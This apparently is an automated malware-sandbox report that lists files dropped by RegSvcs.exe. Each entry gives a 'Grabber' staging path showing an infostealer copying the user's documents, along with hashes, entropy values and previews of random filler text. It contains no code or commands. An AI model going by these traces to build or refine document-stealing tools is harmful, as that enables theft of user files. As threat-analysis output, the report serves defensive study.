Size (bytes):	1026
Entropy (8bit):	4.692335641801684
Encrypted:	false
SSDEEP:	24:zH8U6ceY5aV+Ai0xV38519ItLI1uSTaTtR4kYO9TsrMA7PTOGil5:QlUMHi0xVsrsLcn2hmYA7Pc
MD5:	DEF355B17D73C1495713C5488FCE7339
SHA1:	BECA340E4F9D7795A83636020FCF688DA88FA808
SHA-256:	471A7B08733F8B9E8AB162FE426B75361169906D3DD7564B28B19E4DBA14F328
SHA-512:	E95418C8C9F1A763D004E2572EF9D4379878FDD9D222E4605D7A77ED6D86CC764B68B358A7DFA8ED82749B24ED97FCC81139694A031E9B85032AF6CC1F973F67
Malicious:	false
Preview:	BUFZSQPCOHPBYKALHMHLNSRPRTVPDQBUOCQIUAODIUEKAFQGDJEJWAHUKUUNHNODDXVOYWZMQJTURWDHVUCIFBOWJXTDYGJYMUCANKQYYQDAZPDWHSRGGYVPVGUAROKTZQVZRKBJKUQPVSBXUNUVQUXGDDRCCFXNKCRLUTRGZCDJOZFSITBSODAQBZRACSSJHBZJQSWIDQKMDSFONWLGQGIXRSOSOSXFJYJOURMXKTHTKFPJKNLLIXAXMLRXRNSAITLJNMHURDCGMLBSZZGQUPFGUIAACPLZTRSOAQAAYBEWFKSLEZHQMZKSQNGWWBKCCEEXEFKGZNXXZCVVUCQBYNKOAKNKXZAUNQWYVAHGEZRKCYLJESNPTYNSPXUTDFYXGYZZIQICBFFNUPHHCIBKOGMJGNSDDHJIRRFZCCRFOZGNWZGCDMMSOGVDCESUEEHGPRLMKANOQICCTFXCLZEKAGRGLYLWFGMAGHPKQTDONAQKSFPNLTUUXPEUGETZPBEKMCJNCMHTBKTSCNRNVDHIDSZROKAYGDUISPBLTFVLFSAFKYVLQVJPAVOFSSUSZJNMUYOAKUULNRXBYNACAQEKDHCKCIVUYLXHDFNPCCZGNQLMWIUKMGKTRDESXVITCZNHDZOVZEBRZELODDFSSMCHTFHQMHCXBMKZDOFGFTOYNRJPSRASGBJNFZWJWPLWVHAVKBBVTNIPRUSXAFVYCMDUDJRJPWXFBWBCASKRZICWOFTNARKKQDFROZXDUUROLEJYXUQIETKBJKCQLMILRYABQHMQMPXTIBHFCVWURUXTHWCBAFLDWENGHOTDBECRYJDNCGXVYIOAMIANPSNYYMCPEBELRZLSAHCILCJUWSKZHDCDQPSCITMLNPHLHXANDSONCLLAEXJRKDMXZINBJKHEASISSKRWUYGFHFYXHMNYBHGOHNEUAJQYLOQBNHYGIGKJPTHMVWRDOPYXIXGSHDTONANJGYWXHUWUKASCHBKX

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694579526837108
Encrypted:	false
SSDEEP:	24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
MD5:	2DB1C5AA015E3F413D41884AC02B89BC
SHA1:	4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
SHA-256:	956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
SHA-512:	C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
Malicious:	false
Preview:	LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LFOPODGVOH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LFOPODGVOH.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LFOPODGVOH\AQRFEVRTGL.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LFOPODGVOH\BXAJUJAOEO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701111373123985
Encrypted:	false
SSDEEP:	24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
MD5:	CA5A3E2A0C2DDF92EABE165672425976
SHA1:	1933AC1A510945A766039E7E61D7DA4156E0F074
SHA-256:	4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
SHA-512:	64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
Malicious:	false
Preview:	BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LFOPODGVOH\LFOPODGVOH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LFOPODGVOH\NIRMEKAMZH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694574194309462
Encrypted:	false
SSDEEP:	24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
MD5:	78801AF1375CDD81ED0CC275FE562870
SHA1:	8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
SHA-256:	44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
SHA-512:	E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
Malicious:	false
Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\LFOPODGVOH\QFAPOWPAFG.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
